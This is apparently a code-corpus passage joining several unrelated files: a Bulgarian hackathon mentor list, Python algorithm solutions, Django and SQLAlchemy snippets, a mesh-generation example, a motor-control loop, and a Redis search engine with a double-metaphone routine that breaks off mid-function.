Hacker","room":"305"},{"id":263,"name":"#WhatHacKeriWillSay","room":"1"},{"id":278,"name":"Дзверозаври","room":"mazata"},{"id":283,"name":"Algosquad","room":"2"}]},{"id":92,"name":"Илиян Ненов","description":"<p>Илиян е Senior Product Manager в SAP Labs Bulgaria.</p>\r\n\r\n<p>Може да разчитате на него за:</p>\r\n\r\n<ul>\r\n\t<li>Generating pitching and presenting ideas, design thinking, defining minimum viable product</li>\r\n\t<li>Machine Learning: TensorFlow, Keras, Python, Octave/MATLAB</li>\r\n\t<li>Big-data: Data pre-processing, NoSQL</li>\r\n</ul>","picture":"./Iliyan.jpg","teams":[{"id":272,"name":"Asteria","room":"307"},{"id":265,"name":"OK, Hacker","room":"305"},{"id":278,"name":"Дзверозаври","room":"mazata"},{"id":283,"name":"Algosquad","room":"2"}]},{"id":93,"name":"Георги Налбантов","description":"<p>Георги има PhD по Иконометрика и Компютърни науки от Еразмус Университет в Ротердам. Той има повече от 10 г. опит с анализи, с фокус върху секторите финанси, здравеопазване, маркетинг, life science и енергетика. Георги е преподавател в СУ, Факултет по Икономика и Бизнес Администрация Economics и преподава на магистри "Statistical Learning for Big Data". </p>\r\n\r\n<p>Инструментите му за прогнозно моделиране включват R, Matlab, Python, SPSS, Weka.</p>\r\n\r\n<p> </p>","picture":"./george-sqilline.jpg","teams":[{"id":283,"name":"Algosquad","room":"2"}]},{"id":94,"name":"Марио Стоилов","description":"<p>Като ученик ходи по олимпиади, а като студент започва работа след първи курс. Това прави сборно около 6-7 години занимаване с програмиране. Сред технологиите, с които e работил Марио са: .Net (C#), Java, JavaScript, golang, SQL, Ruby, C/C++ и много други.</p>\r\n\r\n<p>На отборите може да помага с:</p>\r\n\r\n<ul>\r\n\t<li>Aрхитектурата на приложението, което конструират </li>\r\n\t<li>Насоки към самата цел, която искат да постигнат те</li>\r\n</ul>","picture":"./Mario_Stoilov_Whd9Xas.jpg","teams":[{"id":266,"name":"Kappa","room":"100"},{"id":262,"name":"#RoboLove","room":"307"}]},{"id":95,"name":"Томо Симеонов","description":"<p>Томо се занимава с програмиране от почти 10 години - професионално повече от 3 години, като това време е разделено между инвестмънт банка в Лондон и VMware. Участвал е и преди на хакатони като на един от тях е бил сред победителите. </p>\r\n\r\n<p>На отборите може да бъде полезен с:</p>\r\n\r\n<ul>\r\n\t<li>Python , Java, Design Patterns</li>\r\n\t<li>Архитектура като цяло, насоки да станат победители</li>\r\n</ul>","picture":"./TomoSimeonov.bmp","teams":[{"id":273,"name":"Д3В Machines","room":"307"}]}] |
991,634 | d6425a409c07102385c877a20b4e71caa075fe7a | # 2020 카카오 인턴십2 수식 최대화
# https://programmers.co.kr/learn/courses/30/lessons/67257
from itertools import permutations
def solution(expression):
op_list = ['+', '-', '*']
op = []
operand = expression.replace('+', ' ').replace('-', ' ').replace('*', ' ').split()
answer = []
for i in expression:
if i == '-' or i == '*' or i == '+':
op.append(i)
for order in permutations(op_list):
o1, o2, o3 = order
tmp_operand = operand.copy()
tmp_op = op.copy()
while o1 in tmp_op:
idx = tmp_op.index(o1)
tmp_op.remove(o1)
n1 = tmp_operand[idx]
del(tmp_operand[idx])
n2 = tmp_operand[idx]
del(tmp_operand[idx])
tmp_result = eval(n1+o1+n2)
tmp_operand.insert(idx, str(tmp_result))
while o2 in tmp_op:
idx = tmp_op.index(o2)
tmp_op.remove(o2)
n1 = tmp_operand[idx]
del(tmp_operand[idx])
n2 = tmp_operand[idx]
del(tmp_operand[idx])
tmp_result = eval(n1+o2+n2)
tmp_operand.insert(idx, str(tmp_result))
while o3 in tmp_op:
idx = tmp_op.index(o3)
tmp_op.remove(o3)
n1 = tmp_operand[idx]
del(tmp_operand[idx])
n2 = tmp_operand[idx]
del(tmp_operand[idx])
tmp_result = eval(n1+o3+n2)
tmp_operand.insert(idx, str(tmp_result))
answer.append(abs(int(tmp_operand[0])))
return max(answer)
if __name__ == "__main__":
print(solution("100-200*300-500+20")) # 60420
print(solution("50*6-3*2")) # 300
|
991,635 | c4eaa8f0d3324ccd1baee1add89950fba4c986b6 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright [2017] Tatarnikov Viktor [viktor@tatarnikov.org]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from Scopuli.Interfaces.MySQL.SQLAlchemy import *
from Scopuli.Interfaces.MySQL.Schema.Core import File, Image
from Scopuli.Interfaces.MySQL.Schema.Core.User import User
from Scopuli.Interfaces.MySQL.Schema.Web.Core import WebSite, WebPage
import json
class WebModuleSession(Base, Schema):
"""
Таблица с перечнем пользовательских сессий
"""
__tablename__ = 'web_module_session'
__table_args__ = {
'mysql_engine' : 'InnoDB',
'mysql_charset': 'utf8',
'mysql_collate': 'utf8_general_ci',
'mysql_comment': 'Таблица с перечнем пользовательских сессий'
}
id = Column(Integer(), primary_key=True, autoincrement=True, doc="Row ID - Сурогатный ключ")
cd_web_site = Column(Integer(), ForeignKey(WebSite.id), index=True, nullable=False, doc="Ссылка на WebSite")
cd_web_page = Column(Integer(), ForeignKey(WebPage.id), nullable=True, doc="Ссылка на WebPage")
cd_user = Column(Integer(), ForeignKey(User.id), nullable=True, doc="Ссылка на User")
request_url = Column(String(256), ColumnDefault(""), nullable=False, doc="URL текущей страницы")
user_agent = Column(String(256), ColumnDefault(""), nullable=False, doc="Agent пользователя")
user_ip = Column(String(32), ColumnDefault(""), nullable=False, doc="IP адрес пользователя")
user_parms = Column(Text(2048), ColumnDefault(""), nullable=False, doc="Дополнительные данные сессии")
# Automatic Logger
date_active = Column(DateTime(), nullable=False, default=func.utc_timestamp(), onupdate=func.utc_timestamp(),
doc="AutoLogger - Время последней активности")
date_login = Column(DateTime(), nullable=True, doc="AutoLogger - Время авторизации")
# Automatic Logger
date_create = Column(DateTime(), nullable=False, default=func.utc_timestamp(), doc="AutoLogger - Время создания")
date_change = Column(DateTime(), nullable=False, default=func.utc_timestamp(), onupdate=func.utc_timestamp(),
doc="AutoLogger - Время последнего изменения")
#: Преобразованное поле UserParms в JSON Object
__user_parms_json = None
def __user_parms_load(self):
"""
Функция загрузки обьекта из строкового значения извлеченного из БД
:return:
"""
if self.__user_parms_json is None:
if self.user_parms == "":
self.user_parms = "{}"
self.__user_parms_json = json.loads(self.user_parms)
def __user_parms_save(self):
"""
Функция упаковки обьекта в строковое значение с последующей записью в БД
:return: Nothing
"""
if self.__user_parms_json is not None:
self.user_parms = json.dumps(self.__user_parms_json)
def get_property(self, name, default=None):
"""
Функция получения данных из БД
:param name: Название ппараметра
:type name: String
:param default: Значение по умолчанию, если значение не найдено в БД
:type default: Any
:return: Сохраненное значение or default
:rtype: String or default type
"""
self.__user_parms_load()
if name in self.__user_parms_json:
return self.__user_parms_json[name]
return default
def set_property(self, name, value):
"""
Функция записи данных БД
:param name: Название ппараметра
:type name: String
:param value: Сохраняемое значение
:type value: String
:return: Nothing
:rtype: Nothing
"""
self.__user_parms_load()
self.__user_parms_json[name] = value
self.__user_parms_save()
|
991,636 | e1469a384d153ac65b5f538517abf858cc05107c | # -* encoding: utf-8 *-
from django.contrib.auth.middleware import RemoteUserMiddleware
from django.contrib.auth.backends import RemoteUserBackend
class ProxyRemoteUserMiddleware(RemoteUserMiddleware):
"""
This authenticates the remote user against the commonly
used HTTP_REMOTE_USER meta field so that HTTP AUTH
authentication actually works with gunicorn.
"""
header = "HTTP_REMOTE_USER"
class ProxyRemoteUserBackend(RemoteUserBackend):
"""
This makes sure unknown users don't gain access.
"""
create_unknown_user = False
|
991,637 | 164f1d5c27c651cde250962f55591714e92c2b83 | #
# Test script just to make sure if works!
#
# Edited by C. Do on 2014-2-13
import eqsansscript_class_2015Brev1
reload(eqsansscript_class_2015Brev1)
from eqsansscript_class_2015Brev1 import *
{{title}}
{{ipts}}
{{ configuration.absolute_scale_factor }}
{% for entry in entries %}
{{ entry.background_scattering}} {{ entry.background_transmission}} {{ entry.empty_beam}}
{% endfor %}
|
991,638 | 333f13c22ed7813b8badee0f1095d79d3d1640ab | def print_hm(h):
r = len(h)
c = len(h[0])
for i in range(1, r):
for j in range(1, c):
print(h[i][j], end='\t')
print()
class Solution(object):
def maximalRectangle(self, matrix):
"""
:type matrix: List[List[str]]
:rtype: int
"""
# sol: h[j]*(right[j]-left[j]+1) for i and j
# complexity: O(n^2)
# space O(n^2) # input
r = len(matrix)
if r == 0: return 0
c = len(matrix[0])
h = []
left = []
right = []
res = 0
for j in range(0, c):
h.append(0)
left.append(0)
right.append(c-1)
for i in range(0, r):
left_cur = 0
right_cur = c-1
for j in range(0, c):
if matrix[i][j] == '1': h[j]=h[j]+1
else: h[j]=0
for j in range(0, c):
if matrix[i][j] == '1':
left[j] = max(left[j], left_cur)
# depends on the most right last row seen, when following the last row height
else:
left[j] = 0 # lower the height here, so not constraint
left_cur = j+1 # reset
for j in range(c-1, -1, -1):
if matrix[i][j]=='1':
right[j] = min(right_cur, right[j])
# depends on the most left last row seen, when following the last row height
else:
right[j] = c-1 # lower the height here, so not constraint
right_cur = j-1 #reset
#print(i, matrix[i], left, right, h)
for j in range(0, c):
res_tmp = h[j]*(right[j]-left[j]+1)
if res_tmp > res: res = res_tmp
return res
def maximalRectangle1(self, matrix):
"""
:type matrix: List[List[str]]
:rtype: int
"""
# sol(i,j) = max_{t=1,j} h(i,j-t+1)*t
# complexity O(n^3)
r = len(matrix)
if r == 0: return 0
c = len(matrix[0])
h = []
res = 0
for i in range(0, r+1):
na = []
for j in range(0, c+1):
na.append(0)
h.append(na)
for i in range(1, r+1):
for j in range(1, c+1):
if matrix[i-1][j-1] == '1':
h[i][j] = h[i-1][j] + 1
#print_hm(h)
for i in range(1, r+1):
for j in range(1, c+1):
hs = h[i][j]
if matrix[i-1][j-1] != '1': continue
for w in range(j, 0, -1):
if matrix[i-1][w-1] != '1': break
hs = min(hs, h[i][w])
#print('i', i, ' j', j, ':' , hs,'x', (j-w+1))
#print('---')
res_tmp = hs * (j-w+1)
if res < res_tmp:
res = res_tmp
return res
a = Solution()
matrix = ["10100","10111","11111","10010"]
#matrix = ["01101","11010","01110","11110","11111","00000"]
print(a.maximalRectangle(matrix)) |
991,639 | fc384a60dcf113b091e4f1a7b5608594381fd1ef | #Example file to show how to generate mesh with pydistmesh and write it to a file type compatible with fenics
#Alex Martinez-Marchese
# Python imports
import numpy as np
import matplotlib.pyplot as plt
# Local imports
import dolfin as df
import distmesh as dm
#Cone measurements
rad = 0.01
vfr = 0.004
#Functions
def fdout(p):
return dm.dunion(dm.dunion(dm.dcircle(p,0,0,rad), dm.drectangle(p,0.0,2*rad, -rad,rad)), dm.dcircle(p,2*rad,0,rad))
def fd(p):
return dm.ddiff(dm.ddiff(fdout(p), dm.dcircle(p,0,0,vfr)), dm.dcircle(p,2*rad,0,vfr))
def fh(p):
return dm.dunion(dm.dunion(0.0004-0.3*fdout(p), 0.0004+0.3*dm.dcircle(p,0,0,vfr)), 0.0004+0.3*dm.dcircle(p,2*rad,0,vfr))
#Make mesh
np.random.seed(1) # Always the same results
plt.ion()
p, t = dm.distmesh2d(fd, fh, 0.0004, (-0.01,-0.03, 0.03,0.03), 0.001, [(rad,-rad),(2*rad,-rad), (rad,rad),(2*rad,rad)])
# Write mesh as xml file
numVertices = p.shape[0]
numCells = t.shape[0]
editor = df.MeshEditor()
mesh = df.Mesh()
dim = 2
editor.open(mesh, 2, 2) # top. and geom. dimension are both 3
editor.init_vertices(numVertices) # number of vertices
editor.init_cells(numCells) # number of cells
for x in range(0, numVertices):
editor.add_vertex(x, p[x][:])
for x in range(0, numCells):
editor.add_cell(x, np.array(t[x][:], dtype=np.uintp))
editor.close()
#Plot mesh using dolfin
df.plot(mesh)
df.interactive()
#Write to file
df.File('twovortexmesh.xml') << mesh
|
991,640 | a8fe5081c171ab3e94e3ee6a5dcacad082ef9ed9 | from django.apps import AppConfig
class CostoadminConfig(AppConfig):
name = 'costoadmin'
|
991,641 | 840901148676ef625045c94c96190243fc48a2da | import roboclaw, time, math
i = 10
flag = True
while i != -10:
print(i)
roboclaw.M2Forward(128,int(round(i/math.sqrt(3.0))))
roboclaw.M1Forward(128,int(round(i/math.sqrt(3.0))))
roboclaw.M1Backward(129,i)
i = i + 10 if flag else i - 10
if i > 120:
i = 120
flag = False
time.sleep(0.05)
|
991,642 | cce4c572881a0fc0c3e6e883921214e5f753eaed | # -*- coding: utf-8 -*-
# Simple Python Search Engine built on Redis
# https://github.com/ebaum/searchpyre
__author__ = 'Eugene Baumstein'
__license__ = 'MIT'
__version__ = '0.1'
import re
import os
import math
import time
import datetime
import collections
import unicodedata
from redis import StrictRedis
from itertools import chain
_NON_WORDS = re.compile("[^a-z0-9' ]")
_KEY = re.compile('(\w+\.\w+)#([0-9]+):?(\w+)?') # 'app.model#1:word'
_ARTICLES = ('the', 'of', 'to', 'and', 'an', 'in', 'is', 'it', 'you', 'that', 'this')
def _unique(seq):
seen = set()
for item in seq:
if item not in seen:
seen.add(item)
yield item
def _get_words(text, weighted=True):
if not isinstance(text, basestring):
return dict([(str(text), 1)])
words = _NON_WORDS.sub(' ', text.lower()).split()
words = [word for word in words if word not in _ARTICLES and len(word) > 1]
if not weighted:
return words
words = map(lambda x: x if x.isdigit() else _double_metaphone(unicode(x)), words)
words = [word for sublist in words for word in sublist if word]
counts = collections.defaultdict(float)
for word in words:
counts[word] += 1
return dict((word, count / len(words)) for word, count in counts.iteritems())
class _Result(dict):
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self._key = None
self._instance = None
def __hash__(self):
app_dot_model, pk, _ = _KEY.match(self._key).groups()
return hash(app_dot_model + pk)
@property
def instance(self):
if self._key and self._instance is None:
app_dot_model, pk, _ = _KEY.match(self._key).groups()
model = get_model(*app_dot_model.split('.'))
self._instance = model.objects.get(pk=pk)
return self._instance
class Pyre(object):
def __init__(self, *args, **kwargs):
self.redis = StrictRedis(*args, **kwargs)
def _map_results(self, keys):
if not keys:
return []
pipe = self.redis.pipeline()
for key in keys:
app_dot_model, pk, _ = _KEY.match(key).groups()
pipe.hgetall(app_dot_model + '#' + pk)
results = []
indexes = pipe.execute()
for i, index in enumerate(indexes):
for field, value in index.iteritems():
if not value:
continue
if value[0] == 'A':
index[field] = value[2:].split(',')
elif value[0] == 'M':
index[field] = int(value[2:])
elif value[0] == 'T':
index[field] = float(value[2:])
elif value[0] == 'B':
index[field] = bool(value[2:])
elif value[0] == 'I':
index[field] = int(value[2:])
elif value[0] == 'F':
index[field] = float(value[2:])
elif value[0] == 'S':
index[field] = value[2:]
else:
print '\033[93m', 'ERROR', field, value, '\033[0m'
result = _Result(index)
result._key = keys[i]
results.append(result)
return results
def get_all(self, model):
keys = self.redis.keys(model._meta.app_label + '.' + model._meta.module_name + '#*')
results = self._map_results(keys)
return results
def autocomplete(self, query):
keys = ['a:' + key for key in _unique(_get_words(query, weighted=False))]
if not keys:
return []
pipe = self.redis.pipeline()
for key in keys:
pipe.zrevrange(key, 0, -1, withscores=False)
ikeys = [ikey for sublist in pipe.execute() for ikey in sublist]
results = [result for result in _unique(self._map_results(ikeys))]
return results
def search(self, query, offset=0, count=10):
keys = ['w:' + key for key in _get_words(query)]
if not keys:
return []
indexed = max(self.redis.get('indexed'), 1)
pipe = self.redis.pipeline()
for key in keys:
pipe.zcard(key)
counts = pipe.execute()
ranks = [max(math.log(float(indexed) / count, 2), 0) if count else 0 for count in counts]
weights = dict((key, rank) for key, count, rank in zip(keys, counts, ranks) if count)
if not weights:
return []
temp_key = 'temp:' + os.urandom(8).encode('hex')
try:
self.redis.zunionstore(temp_key, weights)
keys = self.redis.zrevrange(temp_key, offset, offset+count-1, withscores=False)
finally:
self.redis.delete(temp_key)
results = self._map_results(keys)
return results
class SearchIndex(object):
def __init__(self, *args, **kwargs):
self.redis = StrictRedis(*args, **kwargs)
def index(self, value, uid=None, key='text', autocompletion=False, **kwargs):
if not uid:
uid = self.redis.incr('indexed')
self.redis.hset(uid, key, value)
pipe = self.redis.pipeline()
if autocompletion:
for i, word in enumerate(_get_words(value, weighted=False)):
for i, letter in enumerate(word):
if len(word) > i + 1:
pipe.zadd('a:' + word[:2+i], 0, uid+':'+word)
else:
for word, value in _get_words(value).iteritems():
pipe.zadd('w:' + word, value, uid)
pipe.execute()
def index_autocomplete(self, value, uid=None, key='text'):
self.index(value, uid, key, autocompletion=True)
if os.environ.get('DJANGO_SETTINGS_MODULE'):
from django.db.models import Model
from django.db.models.base import ModelBase
from django.db.models.manager import Manager
from django.db.models.loading import get_model
class DjangoSearchIndex(SearchIndex):
def __init__(self, source, **kwargs):
self.source = source
self.app_dot_model = source._meta.app_label + '.' + source._meta.module_name
self.redis = StrictRedis(**kwargs)
def index(self, *fields, **kwargs):
if isinstance(self.source, ModelBase):
instances = self.source.objects.all()
elif isinstance(self.source, Model):
instances = [self.source]
else:
raise ImportError('Only Model or Model instances are valid inputs')
for instance in instances:
if kwargs.get('everything'):
fields = chain( [field.name for field in instance._meta.fields],
[field.name for field in instance._meta._many_to_many()] )
for field in set(fields):
value = instance.__getattribute__(field)
if isinstance(value, Manager) and value.all():
value = 'A|' + ','.join([ str(obj.id) for obj in value.all() ])
elif isinstance(value, Model):
value = 'M|' + str(value.pk)
elif isinstance(value, datetime.date):
value = 'T|' + str(time.mktime(value.timetuple()))
elif isinstance(value, bool):
value = 'B|' + ('1' if value else '')
elif isinstance(value, int):
value = 'I|' + str(value)
elif isinstance(value, float):
value = 'F|' + str(value)
elif isinstance(value, basestring) and value:
value = 'S|' + value
else:
value = ''
super(DjangoSearchIndex, self).index(value,
self.app_dot_model + '#' + str(instance.id), field, **kwargs)
def index_autocomplete(self, *fields, **kwargs):
kwargs['autocompletion'] = True
self.index(*fields, **kwargs)
else:
class DjangoSearchIndex(SearchIndex):
def __init__(self, *args, **kwargs):
raise ImportError('DjangoSearchIndex only works in a django environment')
#https://github.com/dracos/double-metaphone
#http://atomboy.isa-geek.com/plone/Members/acoil/programing/double-metaphone/metaphone.py
# {{{
def _double_metaphone(st):
"""double_metaphone(string) -> (string, string or '')
returns the double metaphone codes for given string - always a tuple
there are no checks done on the input string, but it should be a single word or name."""
vowels = ['A', 'E', 'I', 'O', 'U', 'Y']
st = ''.join((c for c in unicodedata.normalize('NFD', st) if unicodedata.category(c) != 'Mn'))
st = st.upper() # st is short for string. I usually prefer descriptive over short, but this var is used a lot!
is_slavo_germanic = (st.find('W') > -1 or st.find('K') > -1 or st.find('CZ') > -1 or st.find('WITZ') > -1)
length = len(st)
first = 2
st = '-' * first + st + '------' # so we can index beyond the begining and end of the input string
last = first + length - 1
pos = first # pos is short for position
pri = sec = '' # primary and secondary metaphone codes
# skip these silent letters when at start of word
if st[first:first + 2] in ["GN", "KN", "PN", "WR", "PS"]:
pos += 1
# Initial 'X' is pronounced 'Z' e.g. 'Xavier'
if st[first] == 'X':
pri = sec = 'S' # 'Z' maps to 'S'
pos += 1
# main loop through chars in st
while pos <= last:
#print str(pos) + '\t' + st[pos]
ch = st[pos] # ch is short for character
# nxt (short for next characters in metaphone code) is set to a tuple of the next characters in
# the primary and secondary codes and how many characters to move forward in the string.
# the secondary code letter is given only when it is different than the primary.
# This is just a trick to make the code easier to write and read.
nxt = (None, 1) # default action is to add nothing and move to next char
if ch in vowels:
nxt = (None, 1)
if pos == first: # all init vowels now map to 'A'
nxt = ('A', 1)
elif ch == 'B':
#"-mb", e.g", "dumb", already skipped over... see 'M' below
if st[pos + 1] == 'B':
nxt = ('P', 2)
else:
nxt = ('P', 1)
elif ch == 'C':
# various germanic
if pos > first + 1 and st[pos - 2] not in vowels and st[pos - 1:pos + 2] == 'ACH' and \
st[pos + 2] not in ['I'] and (st[pos + 2] not in ['E'] or st[pos - 2:pos + 4] in ['BACHER', 'MACHER']):
nxt = ('K', 2)
# special case 'CAESAR'
elif pos == first and st[first:first + 6] == 'CAESAR':
nxt = ('S', 2)
elif st[pos:pos + 4] == 'CHIA': # italian 'chianti'
nxt = ('K', 2)
elif st[pos:pos + 2] == 'CH':
# find 'michael'
if pos > first and st[pos:pos + 4] == 'CHAE':
nxt = ('K', 'X', 2)
elif pos == first and (st[pos + 1:pos + 6] in ['HARAC', 'HARIS'] or \
st[pos + 1:pos + 4] in ["HOR", "HYM", "HIA", "HEM"]) and st[first:first + 5] != 'CHORE':
nxt = ('K', 2)
#germanic, greek, or otherwise 'ch' for 'kh' sound
elif st[first:first + 4] in ['VAN ', 'VON '] or st[first:first + 3] == 'SCH' \
or st[pos - 2:pos + 4] in ["ORCHES", "ARCHIT", "ORCHID"] \
or st[pos + 2] in ['T', 'S'] \
or ((st[pos - 1] in ["A", "O", "U", "E"] or pos == first) \
and st[pos + 2] in ["L", "R", "N", "M", "B", "H", "F", "V", "W"]):
nxt = ('K', 2)
else:
if pos > first:
if st[first:first + 2] == 'MC':
nxt = ('K', 2)
else:
nxt = ('X', 'K', 2)
else:
nxt = ('X', 2)
# e.g, 'czerny'
elif st[pos:pos + 2] == 'CZ' and st[pos - 2:pos + 2] != 'WICZ':
nxt = ('S', 'X', 2)
# e.g., 'focaccia'
elif st[pos + 1:pos + 4] == 'CIA':
nxt = ('X', 3)
# double 'C', but not if e.g. 'McClellan'
elif st[pos:pos + 2] == 'CC' and not (pos == (first + 1) and st[first] == 'M'):
#'bellocchio' but not 'bacchus'
if st[pos + 2] in ["I", "E", "H"] and st[pos + 2:pos + 4] != 'HU':
# 'accident', 'accede' 'succeed'
if (pos == (first + 1) and st[first] == 'A') or \
st[pos - 1:pos + 4] in ['UCCEE', 'UCCES']:
nxt = ('KS', 3)
# 'bacci', 'bertucci', other italian
else:
nxt = ('X', 3)
else:
nxt = ('K', 2)
elif st[pos:pos + 2] in ["CK", "CG", "CQ"]:
nxt = ('K', 2)
elif st[pos:pos + 2] in ["CI", "CE", "CY"]:
# italian vs. english
if st[pos:pos + 3] in ["CIO", "CIE", "CIA"]:
nxt = ('S', 'X', 2)
else:
nxt = ('S', 2)
else:
# name sent in 'mac caffrey', 'mac gregor
if st[pos + 1:pos + 3] in [" C", " Q", " G"]:
nxt = ('K', 3)
else:
if st[pos + 1] in ["C", "K", "Q"] and st[pos + 1:pos + 3] not in ["CE", "CI"]:
nxt = ('K', 2)
else: # default for 'C'
nxt = ('K', 1)
elif ch == u'\xc7': # will never get here with st.encode('ascii', 'replace') above
# \xc7 is UTF-8 encoding of Ç
nxt = ('S', 1)
elif ch == 'D':
if st[pos:pos + 2] == 'DG':
if st[pos + 2] in ['I', 'E', 'Y']: # e.g. 'edge'
nxt = ('J', 3)
else:
nxt = ('TK', 2)
elif st[pos:pos + 2] in ['DT', 'DD']:
nxt = ('T', 2)
else:
nxt = ('T', 1)
elif ch == 'F':
if st[pos + 1] == 'F':
nxt = ('F', 2)
else:
nxt = ('F', 1)
elif ch == 'G':
if st[pos + 1] == 'H':
if pos > first and st[pos - 1] not in vowels:
nxt = ('K', 2)
elif pos < (first + 3):
if pos == first: # 'ghislane', ghiradelli
if st[pos + 2] == 'I':
nxt = ('J', 2)
else:
nxt = ('K', 2)
# Parker's rule (with some further refinements) - e.g., 'hugh'
elif (pos > (first + 1) and st[pos - 2] in ['B', 'H', 'D']) \
or (pos > (first + 2) and st[pos - 3] in ['B', 'H', 'D']) \
or (pos > (first + 3) and st[pos - 3] in ['B', 'H']):
nxt = (None, 2)
else:
# e.g., 'laugh', 'McLaughlin', 'cough', 'gough', 'rough', 'tough'
if pos > (first + 2) and st[pos - 1] == 'U' \
and st[pos - 3] in ["C", "G", "L", "R", "T"]:
nxt = ('F', 2)
else:
if pos > first and st[pos - 1] != 'I':
nxt = ('K', 2)
elif st[pos + 1] == 'N':
if pos == (first + 1) and st[first] in vowels and not is_slavo_germanic:
nxt = ('KN', 'N', 2)
else:
# not e.g. 'cagney'
if st[pos + 2:pos + 4] != 'EY' and st[pos + 1] != 'Y' and not is_slavo_germanic:
nxt = ('N', 'KN', 2)
else:
nxt = ('KN', 2)
# 'tagliaro'
elif st[pos + 1:pos + 3] == 'LI' and not is_slavo_germanic:
nxt = ('KL', 'L', 2)
# -ges-,-gep-,-gel-, -gie- at beginning
elif pos == first and (st[pos + 1] == 'Y' \
or st[pos + 1:pos + 3] in ["ES", "EP", "EB", "EL", "EY", "IB", "IL", "IN", "IE", "EI", "ER"]):
nxt = ('K', 'J', 2)
# -ger-, -gy-
elif (st[pos + 1:pos + 3] == 'ER' or st[pos + 1] == 'Y') \
and st[first:first + 6] not in ["DANGER", "RANGER", "MANGER"] \
and st[pos - 1] not in ['E', 'I'] and st[pos - 1:pos + 2] not in ['RGY', 'OGY']:
nxt = ('K', 'J', 2)
# italian e.g, 'biaggi'
elif st[pos + 1] in ['E', 'I', 'Y'] or st[pos - 1:pos + 3] in ["AGGI", "OGGI"]:
# obvious germanic
if st[first:first + 4] in ['VON ', 'VAN '] or st[first:first + 3] == 'SCH' \
or st[pos + 1:pos + 3] == 'ET':
nxt = ('K', 2)
else:
# always soft if french ending
if st[pos + 1:pos + 5] == 'IER ':
nxt = ('J', 2)
else:
nxt = ('J', 'K', 2)
elif st[pos + 1] == 'G':
nxt = ('K', 2)
else:
nxt = ('K', 1)
elif ch == 'H':
# only keep if first & before vowel or btw. 2 vowels
if (pos == first or st[pos - 1] in vowels) and st[pos + 1] in vowels:
nxt = ('H', 2)
else: # (also takes care of 'HH')
nxt = (None, 1)
elif ch == 'J':
# obvious spanish, 'jose', 'san jacinto'
if st[pos:pos + 4] == 'JOSE' or st[first:first + 4] == 'SAN ':
if (pos == first and st[pos + 4] == ' ') or st[first:first + 4] == 'SAN ':
nxt = ('H', )
else:
nxt = ('J', 'H')
elif pos == first and st[pos:pos + 4] != 'JOSE':
nxt = ('J', 'A') # Yankelovich/Jankelowicz
else:
# spanish pron. of e.g. 'bajador'
if st[pos - 1] in vowels and not is_slavo_germanic \
and st[pos + 1] in ['A', 'O']:
nxt = ('J', 'H')
else:
if pos == last:
nxt = ('J', ' ')
else:
if st[pos + 1] not in ["L", "T", "K", "S", "N", "M", "B", "Z"] \
and st[pos - 1] not in ["S", "K", "L"]:
nxt = ('J', )
else:
nxt = (None, )
if st[pos + 1] == 'J':
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
elif ch == 'K':
if st[pos + 1] == 'K':
nxt = ('K', 2)
else:
nxt = ('K', 1)
elif ch == 'L':
if st[pos + 1] == 'L':
# spanish e.g. 'cabrillo', 'gallegos'
if (pos == (last - 2) and st[pos - 1:pos + 3] in ["ILLO", "ILLA", "ALLE"]) \
or ((st[last - 1:last + 1] in ["AS", "OS"] or st[last] in ["A", "O"]) \
and st[pos - 1:pos + 3] == 'ALLE'):
nxt = ('L', ' ', 2)
else:
nxt = ('L', 2)
else:
nxt = ('L', 1)
elif ch == 'M':
if (st[pos + 1:pos + 4] == 'UMB' \
and (pos + 1 == last or st[pos + 2:pos + 4] == 'ER')) \
or st[pos + 1] == 'M':
nxt = ('M', 2)
else:
nxt = ('M', 1)
elif ch == 'N':
if st[pos + 1] == 'N':
nxt = ('N', 2)
else:
nxt = ('N', 1)
elif ch == u'\xd1': # UTF-8 encoding of ト
nxt = ('N', 1)
elif ch == 'P':
if st[pos + 1] == 'H':
nxt = ('F', 2)
elif st[pos + 1] in ['P', 'B']: # also account for "campbell", "raspberry"
nxt = ('P', 2)
else:
nxt = ('P', 1)
elif ch == 'Q':
if st[pos + 1] == 'Q':
nxt = ('K', 2)
else:
nxt = ('K', 1)
elif ch == 'R':
# french e.g. 'rogier', but exclude 'hochmeier'
if pos == last and not is_slavo_germanic \
and st[pos - 2:pos] == 'IE' and st[pos - 4:pos - 2] not in ['ME', 'MA']:
nxt = ('', 'R')
else:
nxt = ('R', )
if st[pos + 1] == 'R':
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
elif ch == 'S':
# special cases 'island', 'isle', 'carlisle', 'carlysle'
if st[pos - 1:pos + 2] in ['ISL', 'YSL']:
nxt = (None, 1)
# special case 'sugar-'
elif pos == first and st[first:first + 5] == 'SUGAR':
nxt = ('X', 'S', 1)
elif st[pos:pos + 2] == 'SH':
# germanic
if st[pos + 1:pos + 5] in ["HEIM", "HOEK", "HOLM", "HOLZ"]:
nxt = ('S', 2)
else:
nxt = ('X', 2)
# italian & armenian
elif st[pos:pos + 3] in ["SIO", "SIA"] or st[pos:pos + 4] == 'SIAN':
if not is_slavo_germanic:
nxt = ('S', 'X', 3)
else:
nxt = ('S', 3)
# german & anglicisations, e.g. 'smith' match 'schmidt', 'snider' match 'schneider'
# also, -sz- in slavic language altho in hungarian it is pronounced 's'
elif (pos == first and st[pos + 1] in ["M", "N", "L", "W"]) or st[pos + 1] == 'Z':
nxt = ('S', 'X')
if st[pos + 1] == 'Z':
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
elif st[pos:pos + 2] == 'SC':
# Schlesinger's rule
if st[pos + 2] == 'H':
# dutch origin, e.g. 'school', 'schooner'
if st[pos + 3:pos + 5] in ["OO", "ER", "EN", "UY", "ED", "EM"]:
# 'schermerhorn', 'schenker'
if st[pos + 3:pos + 5] in ['ER', 'EN']:
nxt = ('X', 'SK', 3)
else:
nxt = ('SK', 3)
else:
if pos == first and st[first + 3] not in vowels and st[first + 3] != 'W':
nxt = ('X', 'S', 3)
else:
nxt = ('X', 3)
elif st[pos + 2] in ['I', 'E', 'Y']:
nxt = ('S', 3)
else:
nxt = ('SK', 3)
